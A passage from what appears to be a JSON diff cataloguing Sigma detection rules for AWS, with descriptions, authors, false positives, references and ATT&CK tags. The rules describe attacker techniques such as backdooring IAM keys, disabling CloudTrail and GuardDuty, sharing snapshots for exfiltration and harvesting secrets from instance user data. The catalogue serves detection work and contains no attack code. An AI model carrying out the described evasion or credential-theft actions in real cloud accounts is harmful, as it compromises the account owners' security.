"https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketLogging.html", + "https://docs.aws.amazon.com/AmazonS3/latest/API/API_RestoreObject.html", + "https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketWebsite.html", + "https://github.com/elastic/detection-rules/pull/1145/files", + "https://docs.aws.amazon.com/AmazonS3/latest/userguide/setting-repl-config-perm-overview.html", + "https://docs.aws.amazon.com/AmazonS3/latest/API/API_Operations.html", + "https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketEncryption.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_s3_data_management_tampering.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1537" + ] + }, + "uuid": "78b3756a-7804-4ef7-8555-7b9024a02e2d", + "value": "AWS S3 Data Management Tampering" + }, + { + "description": "Identifies disabling of default Amazon Elastic Block Store (EBS) encryption in the current region.\nDisabling default encryption does not change the encryption status of your existing volumes.\n", + "meta": { + "author": "Sittikorn S", + "creation_date": "2021/06/29", + "falsepositive": [ + "System Administrator Activities", + "DEV, UAT, SAT environment. You should apply this rule with PROD account only." + ], + "filename": "aws_ec2_disable_encryption.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "aws", + "refs": [ + "https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DisableEbsEncryptionByDefault.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_ec2_disable_encryption.yml" + ], + "tags": [ + "attack.impact", + "attack.t1486", + "attack.t1565" + ] + }, + "uuid": "16124c2d-e40b-4fcc-8f2c-5ab7870a2223", + "value": "AWS EC2 Disable EBS Encryption" + }, + { + "description": "Detects AWS API key creation for a user by another user.\nBackdoored users can be used to obtain persistence in the AWS environment.\nAlso with this alert, you can detect a flow of AWS keys in your org.\n", + "meta": { + "author": "faloker", + "creation_date": "2020/02/12", + "falsepositive": [ + "Adding user keys to their own accounts (the filter cannot cover all possible variants of user naming)", + "AWS API keys legitimate exchange workflows" + ], + "filename": "aws_iam_backdoor_users_keys.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "aws", + "refs": [ + "https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/iam__backdoor_users_keys/main.py", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_iam_backdoor_users_keys.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1098" + ] + }, + "uuid": "0a5177f4-6ca9-44c2-aacf-d3f3d8b6e4d2", + "value": "AWS IAM Backdoor Users Keys" + }, + { + "description": "Detects the modification of the findings on SecurityHub.", + "meta": { + "author": "Sittikorn S", + "creation_date": "2021/06/28", + "falsepositive": [ + "System or Network administrator behaviors", + "DEV, UAT, SAT environment. You should apply this rule with PROD environment only." + ], + "filename": "aws_securityhub_finding_evasion.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "aws", + "refs": [ + "https://docs.aws.amazon.com/cli/latest/reference/securityhub/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_securityhub_finding_evasion.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562" + ] + }, + "uuid": "a607e1fe-74bf-4440-a3ec-b059b9103157", + "value": "AWS SecurityHub Findings Evasion" + }, + { + "description": "Detects when an Elastic Container Service (ECS) Task Definition has been modified and run.\nThis can indicate an adversary adding a backdoor to establish persistence or escalate privileges.\nThis rule is based on examining events created upon execution of Rhino Security Lab's Pacu in a lab environment.\n", + "meta": { + "author": "Darin Smith", + "creation_date": "2022/06/07", + "falsepositive": [ + "Task Definition being modified to request credentials from the Task Metadata Service for valid reasons" + ], + "filename": "aws_ecs_task_definition_backdoor.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "aws", + "refs": [ + "https://attack.mitre.org/techniques/T1525", + "https://docs.aws.amazon.com/AmazonECS/latest/APIReference/API_RegisterTaskDefinition.html", + "https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/ecs__backdoor_task_def/main.py", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_ecs_task_definition_backdoor.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1525" + ] + }, + "uuid": "b94bf91e-c2bf-4047-9c43-c6810f43baad", + "value": "AWS ECS Backdoor Task Definition" + }, + { + "description": "Detects an instance of an SES identity being deleted via the \"DeleteIdentity\" event. This may be an indicator of an adversary removing the account that carried out suspicious or malicious activities", + "meta": { + "author": "Janantha Marasinghe", + "creation_date": "2022/12/13", + "falsepositive": [ + "Unknown" + ], + "filename": "aws_delete_identity.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "aws", + "refs": [ + "https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_delete_identity.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070" + ] + }, + "uuid": "20f754db-d025-4a8f-9d74-e0037e999a9a", + "value": "SES Identity Has Been Deleted" + }, + { + "description": "Detects potential enumeration activity targeting AWS storage", + "meta": { + "author": "Janantha Marasinghe", + "creation_date": "2022/12/13", + "falsepositive": [ + "Unknown" + ], + "filename": "aws_enum_storage.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "aws", + "refs": [ + "https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_enum_storage.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1619" + ] + }, + "uuid": "4723218f-2048-41f6-bcb0-417f2d784f61", + "value": "Potential Storage Enumeration on AWS" + }, + { + "description": "Detects the modification of an EC2 snapshot's permissions to enable access from another account", + "meta": { + "author": "Darin Smith", + "creation_date": "2021/05/17", + "falsepositive": [ + "Valid change to a snapshot's permissions" + ], + "filename": "aws_snapshot_backup_exfiltration.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "aws", + "refs": [ + "https://www.justice.gov/file/1080281/download", + "https://attack.mitre.org/techniques/T1537/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_snapshot_backup_exfiltration.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1537" + ] + }, + "uuid": "abae8fec-57bd-4f87-aff6-6e3db989843d", + "value": "AWS Snapshot Backup Exfiltration" + }, + { + "description": "Detects potential enumeration activity targeting an AWS instance backups", + "meta": { + "author": "Janantha Marasinghe", + "creation_date": "2022/12/13", + "falsepositive": [ + "Unknown" + ], + "filename": "aws_enum_backup.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "aws", + "refs": [ + "https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_enum_backup.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1580" + ] + }, + "uuid": "76255e09-755e-4675-8b6b-dbce9842cd2a", + "value": "Potential Backup Enumeration on AWS" + }, + { + "description": "Detects when a EFS Fileshare Mount is modified or deleted. An adversary breaking any file system using the mount target that is being deleted, which might disrupt instances or applications using those mounts.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/15", + "falsepositive": [ + "Unknown" + ], + "filename": "aws_efs_fileshare_mount_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "aws", + "refs": [ + "https://docs.aws.amazon.com/efs/latest/ug/API_DeleteMountTarget.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_efs_fileshare_mount_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact", + "attack.t1485" + ] + }, + "uuid": "6a7ba45c-63d8-473e-9736-2eaabff79964", + "value": "AWS EFS Fileshare Mount Modified or Deleted" + }, + { + "description": "Detects when a request has been made to transfer a Route 53 domain to another AWS account.", + "meta": { + "author": "Elastic, Austin Songer @austinsonger", + "creation_date": "2021/07/22", + "falsepositive": [ + "A domain may be transferred to another AWS account by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Domain transfers from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "aws_route_53_domain_transferred_to_another_account.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "aws", + "refs": [ + "https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/integrations/aws/persistence_route_53_domain_transferred_to_another_account.toml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_route_53_domain_transferred_to_another_account.yml" + ], + "tags": [ + "attack.persistence", + "attack.credential_access", + "attack.t1098" + ] + }, + "uuid": "b056de1a-6e6e-4e40-a67e-97c9808cf41b", + "value": "AWS Route 53 Domain Transferred to Another Account" + }, + { + "description": "Detects when the email sending feature is enabled for an AWS account and the email address verification request is dispatched in quick succession", + "meta": { + "author": "Janantha Marasinghe", + "creation_date": "2022/12/12", + "falsepositive": [ + "Legitimate SES configuration activity" + ], + "filename": "aws_ses_messaging_enabled.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "aws", + "refs": [ + "https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_ses_messaging_enabled.yml" + ], + "tags": [ + "attack.t1583.006", + "attack.resource_development" + ] + }, + "uuid": "60b84424-a724-4502-bd0d-cc676e1bc90e", + "value": "Potential AWS Cloud Email Service Abuse" + }, + { + "description": "Detects when an user creates or invokes a lambda function.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/10/03", + "falsepositive": [ + "Lambda Function created or invoked may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "aws_lambda_function_created_or_invoked.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "aws", + "refs": [ + "https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_lambda_function_created_or_invoked.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1078" + ] + }, + "uuid": "d914951b-52c8-485f-875e-86abab710c0b", + "value": "AWS Lambda Function Created or Invoked" + }, + { + "description": "Identifies the suspicious use of AssumeRole. Attackers could move laterally and escalate privileges.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/07/24", + "falsepositive": [ + "AssumeRole may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "AssumeRole from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule.", + "Automated processes that uses Terraform may lead to false positives." + ], + "filename": "aws_sts_assumerole_misuse.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "aws", + "refs": [ + "https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRole.html", + "https://github.com/elastic/detection-rules/pull/1214", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_sts_assumerole_misuse.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.privilege_escalation", + "attack.t1548", + "attack.t1550", + "attack.t1550.001" + ] + }, + "uuid": "905d389b-b853-46d0-9d3d-dea0d3a3cd49", + "value": "AWS STS AssumeRole Misuse" + }, + { + "description": "Detects the change of database master password. It may be a part of data exfiltration.", + "meta": { + "author": "faloker", + "creation_date": "2020/02/12", + "falsepositive": [ + "Benign changes to a db instance" + ], + "filename": "aws_rds_change_master_password.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "aws", + "refs": [ + "https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/rds__explore_snapshots/main.py", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_rds_change_master_password.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1020" + ] + }, + "uuid": "8a63cdd4-6207-414a-85bc-7e032bd3c1a2", + "value": "AWS RDS Master Password Change" + }, + { + "description": "Identifies when an ElastiCache security group has been modified or deleted.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/07/24", + "falsepositive": [ + "A ElastiCache security group deletion may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Security Group deletions from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "aws_elasticache_security_group_modified_or_deleted.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "aws", + "refs": [ + "https://github.com/elastic/detection-rules/blob/7d5efd68603f42be5e125b5a6a503b2ef3ac0f4e/rules/integrations/aws/impact_elasticache_security_group_modified_or_deleted.toml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_elasticache_security_group_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact", + "attack.t1531" + ] + }, + "uuid": "7c797da2-9cf2-4523-ba64-33b06339f0cc", + "value": "AWS ElastiCache Security Group Modified or Deleted" + }, + { + "description": "Identifies when suspicious SAML activity has occurred in AWS. An adversary could gain backdoor access via SAML.", + "meta": { + "author": "Austin Songer", + "creation_date": "2021/09/22", + "falsepositive": [ + "Automated processes that uses Terraform may lead to false positives.", + "SAML Provider could be updated by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "SAML Provider being updated from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "aws_susp_saml_activity.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "aws", + "refs": [ + "https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRoleWithSAML.html", + "https://docs.aws.amazon.com/IAM/latest/APIReference/API_UpdateSAMLProvider.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_susp_saml_activity.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1078", + "attack.lateral_movement", + "attack.t1548", + "attack.privilege_escalation", + "attack.t1550", + "attack.t1550.001" + ] + }, + "uuid": "f43f5d2f-3f2a-4cc8-b1af-81fde7dbaf0e", + "value": "AWS Suspicious SAML Activity" + }, + { + "description": "Identifies when an EKS cluster is created or deleted.", + "meta": { + "author": "Austin Songer", + "creation_date": "2021/08/16", + "falsepositive": [ + "EKS Cluster being created or deleted may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "EKS Cluster created or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "aws_eks_cluster_created_or_deleted.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "aws", + "refs": [ + "https://any-api.com/amazonaws_com/eks/docs/API_Description", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml" + ], + "tags": [ + "attack.impact", + "attack.t1485" + ] + }, + "uuid": "33d50d03-20ec-4b74-a74e-1e65a38af1c0", + "value": "AWS EKS Cluster Created or Deleted" + }, + { + "description": "Detects the recovery of a new public database instance from a snapshot. It may be a part of data exfiltration.", + "meta": { + "author": "faloker", + "creation_date": "2020/02/12", + "falsepositive": [ + "Unknown" + ], + "filename": "aws_rds_public_db_restore.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "aws", + "refs": [ + "https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/rds__explore_snapshots/main.py", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_rds_public_db_restore.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1020" + ] + }, + "uuid": "c3f265c7-ff03-4056-8ab2-d486227b4599", + "value": "Restore Public AWS RDS Instance" + }, + { + "description": "Detects disabling, deleting and updating of a Trail", + "meta": { + "author": "vitaliy0x1", + "creation_date": "2020/01/21", + "falsepositive": [ + "Valid change in a Trail" + ], + "filename": "aws_cloudtrail_disable_logging.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "aws", + "refs": [ + "https://docs.aws.amazon.com/awscloudtrail/latest/userguide/best-practices-security.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_cloudtrail_disable_logging.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "4db60cc0-36fb-42b7-9b58-a5b53019fb74", + "value": "AWS CloudTrail Important Change" + }, + { + "description": "Detects changes to the EC2 instance startup script. The shell script will be executed as root/SYSTEM every time the specific instances are booted up.", + "meta": { + "author": "faloker", + "creation_date": "2020/02/12", + "falsepositive": [ + "Valid changes to the startup script" + ], + "filename": "aws_ec2_startup_script_change.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "aws", + "refs": [ + "https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/ec2__startup_shell_script/main.py#L9", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_ec2_startup_script_change.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.t1059.003", + "attack.t1059.004" + ] + }, + "uuid": "1ab3c5ed-5baf-417b-bb6b-78ca33f6c3df", + "value": "AWS EC2 Startup Shell Script Change" + }, + { + "description": "An attacker with the iam:UpdateLoginProfile permission on other users can change the password used to login to the AWS console on any user that already has a login profile setup.\nWith this alert, it is used to detect anyone is changing password on behalf of other users.\n", + "meta": { + "author": "toffeebr33k", + "creation_date": "2021/08/09", + "falsepositive": [ + "Legit User Account Administration" + ], + "filename": "aws_update_login_profile.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "aws", + "refs": [ + "https://github.com/RhinoSecurityLabs/AWS-IAM-Privilege-Escalation", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_update_login_profile.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1098" + ] + }, + "uuid": "055fb148-60f8-462d-ad16-26926ce050f1", + "value": "AWS User Login Profile Was Modified" + }, + { + "description": "An attempt to export an AWS EC2 instance has been detected. A VM Export might indicate an attempt to extract information from an instance.", + "meta": { + "author": "Diogo Braz", + "creation_date": "2020/04/16", + "falsepositive": "No established falsepositives", + "filename": "aws_ec2_vm_export_failure.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "aws", + "refs": [ + "https://docs.aws.amazon.com/vm-import/latest/userguide/vmexport.html#export-instance", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_ec2_vm_export_failure.yml" + ], + "tags": [ + "attack.collection", + "attack.t1005", + "attack.exfiltration", + "attack.t1537" + ] + }, + "uuid": "54b9a76a-3c71-4673-b4b3-2edb4566ea7b", + "value": "AWS EC2 VM Export Failure" + }, + { + "description": "Detects bulk downloading of User Data associated with AWS EC2 instances. Instance User Data may include installation scripts and hard-coded secrets for deployment.", + "meta": { + "author": "faloker", + "creation_date": "2020/02/11", + "falsepositive": [ + "Assets management software like device42" + ], + "filename": "aws_ec2_download_userdata.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "aws", + "refs": [ + "https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/ec2__download_userdata/main.py", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_ec2_download_userdata.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1020" + ] + }, + "uuid": "26ff4080-194e-47e7-9889-ef7602efed0c", + "value": "AWS EC2 Download Userdata" + }, + { + "description": "Identifies the suspicious use of GetSessionToken. Tokens could be created and used by attackers to move laterally and escalate privileges.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/07/24", + "falsepositive": [ + "GetSessionToken may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. GetSessionToken from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "aws_sts_getsessiontoken_misuse.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "aws", + "refs": [ + "https://github.com/elastic/detection-rules/pull/1213", + "https://docs.aws.amazon.com/STS/latest/APIReference/API_GetSessionToken.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_sts_getsessiontoken_misuse.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.privilege_escalation", + "attack.t1548", + "attack.t1550", + "attack.t1550.001" + ] + }, + "uuid": "b45ab1d2-712f-4f01-a751-df3826969807", + "value": "AWS STS GetSessionToken Misuse" + }, + { + "description": "Detects updates of the GuardDuty list of trusted IPs, perhaps to disable security alerts against malicious IPs.", + "meta": { + "author": "faloker", + "creation_date": "2020/02/11", + "falsepositive": [ + "Valid change in the GuardDuty (e.g. to ignore internal scanners)" + ], + "filename": "aws_guardduty_disruption.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "aws", + "refs": [ + "https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/guardduty__whitelist_ip/main.py#L9", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_guardduty_disruption.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "6e61ee20-ce00-4f8d-8aee-bedd8216f7e3", + "value": "AWS GuardDuty Important Change" + }, + { + "description": "Detects when an user attached a Lambda layer to an existing function to override a library that is in use by the function, where their malicious code could utilize the function's IAM role for AWS API calls.\nThis would give an adversary access to the privileges associated with the Lambda service role that is attached to that function.\n", + "meta": { + "author": "Austin Songer", + "creation_date": "2021/09/23", + "falsepositive": [ + "Lambda Layer being attached may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Lambda Layer being attached from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "aws_attached_malicious_lambda_layer.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "aws", + "refs": [ + "https://docs.aws.amazon.com/lambda/latest/dg/API_UpdateFunctionConfiguration.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_attached_malicious_lambda_layer.yml" + ], + "tags": [ + "attack.privilege_escalation" + ] + }, + "uuid": "97fbabf8-8e1b-47a2-b7d5-a418d2b95e3d", + "value": "AWS Attached Malicious Lambda Layer" + }, + { + "description": "Detects when a transfer lock was removed from a Route 53 domain. It is recommended to refrain from performing this action unless intending to transfer the domain to a different registrar.", + "meta": { + "author": "Elastic, Austin Songer @austinsonger", + "creation_date": "2021/07/22", + "falsepositive": [ + "A domain transfer lock may be disabled by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Activity from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "aws_route_53_domain_transferred_lock_disabled.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "aws", + "refs": [ + "https://docs.aws.amazon.com/Route53/latest/APIReference/API_domains_DisableDomainTransferLock.html", + "https://docs.aws.amazon.com/Route53/latest/APIReference/API_Operations_Amazon_Route_53.html", + "https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/integrations/aws/persistence_route_53_domain_transfer_lock_disabled.toml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_route_53_domain_transferred_lock_disabled.yml" + ], + "tags": [ + "attack.persistence", + "attack.credential_access", + "attack.t1098" + ] + }, + "uuid": "3940b5f1-3f46-44aa-b746-ebe615b879e0", + "value": "AWS Route 53 Domain Transfer Lock Disabled" + }, + { + "description": "Detects evade to Macie detection.", + "meta": { + "author": "Sittikorn S", + "creation_date": "2021/07/06", + "falsepositive": [ + "System or Network administrator behaviors" + ], + "filename": "aws_macic_evasion.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "aws", + "refs": [ + "https://docs.aws.amazon.com/cli/latest/reference/macie/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_macic_evasion.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "91f6a16c-ef71-437a-99ac-0b070e3ad221", + "value": "AWS Macie Evasion" + }, + { + "description": "Detects when a EFS Fileshare is modified or deleted.\nYou can't delete a file system that is in use.\nIf the file system has any mount targets, the adversary must first delete them, so deletion of a mount will occur before deletion of a fileshare.\n", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/15", + "falsepositive": [ + "Unknown" + ], + "filename": "aws_efs_fileshare_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "aws", + "refs": [ + "https://docs.aws.amazon.com/efs/latest/ug/API_DeleteFileSystem.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_efs_fileshare_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "25cb1ba1-8a19-4a23-a198-d252664c8cef", + "value": "AWS EFS Fileshare Modified or Deleted" + }, + { + "description": "Detects enumeration of accounts configuration via api call to list different instances and services within a short period of time.", + "meta": { + "author": "toffeebr33k", + "creation_date": "2020/11/21", + "falsepositive": [ + "AWS Config or other configuration scanning activities" + ], + "filename": "aws_enum_listing.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "aws", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_enum_listing.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1592" + ] + }, + "uuid": "e9c14b23-47e2-4a8b-8a63-d36618e33d70", + "value": "Account Enumeration on AWS" + }, + { + "description": "Detects network enumeration performed on AWS.", + "meta": { + "author": "Janantha Marasinghe", + "creation_date": "2022/12/13", + "falsepositive": [ + "Unknown" + ], + "filename": "aws_enum_network.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "aws", + "refs": [ + "https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_enum_network.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1016" + ] + }, + "uuid": "c3d53999-4b14-4ddd-9d9b-e618c366b54d", + "value": "Potential Network Enumeration on AWS" + }, + { + "description": "Detects possible suspicious glue development endpoint activity.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/10/03", + "falsepositive": [ + "Glue Development Endpoint Activity may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "aws_passed_role_to_glue_development_endpoint.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "aws", + "refs": [ + "https://docs.aws.amazon.com/glue/latest/webapi/API_CreateDevEndpoint.html", + "https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_passed_role_to_glue_development_endpoint.yml" + ], + "tags": [ + "attack.privilege_escalation" + ] + }, + "uuid": "4990c2e3-f4b8-45e3-bc3c-30b14ff0ed26", + "value": "AWS Glue Development Endpoint Activity" + }, + { + "description": "Detects AWS root account usage", + "meta": { + "author": "vitaliy0x1", + "creation_date": "2020/01/21", + "falsepositive": [ + "AWS Tasks That Require AWS Account Root User Credentials https://docs.aws.amazon.com/general/latest/gr/aws_tasks-that-require-root.html" + ], + "filename": "aws_root_account_usage.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "aws", + "refs": [ + "https://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_root_account_usage.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1078.004" + ] + }, + "uuid": "8ad1600d-e9dc-4251-b0ee-a65268f29add", + "value": "AWS Root Credentials" + }, + { + "description": "Detects AWS Config Service disabling", + "meta": { + "author": "vitaliy0x1", + "creation_date": "2020/01/21", + "falsepositive": [ + "Valid change in AWS Config Service" + ], + "filename": "aws_config_disable_recording.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "aws", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_config_disable_recording.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "07330162-dba1-4746-8121-a9647d49d297", + "value": "AWS Config Disabling Channel/Recorder" + }, + { + "description": "Detects when an ElastiCache security group has been created.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/07/24", + "falsepositive": [ + "A ElastiCache security group may be created by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Security group creations from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "aws_elasticache_security_group_created.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "aws", + "refs": [ + "https://github.com/elastic/detection-rules/blob/598f3d7e0a63221c0703ad9a0ea7e22e7bc5961e/rules/integrations/aws/persistence_elasticache_security_group_creation.toml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_elasticache_security_group_created.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1136", + "attack.t1136.003" + ] + }, + "uuid": "4ae68615-866f-4304-b24b-ba048dfa5ca7", + "value": "AWS ElastiCache Security Group Created" + }, + { + "description": "Alert on when legecy authentication has been used on an account", + "meta": { + "author": "Yochana Henderson, '@Yochana-H'", + "creation_date": "2022/06/17", + "falsepositive": [ + "User has been put in acception group so they can use legacy authentication" + ], + "filename": "azure_legacy_authentication_protocols.yml", + "level": "high", + 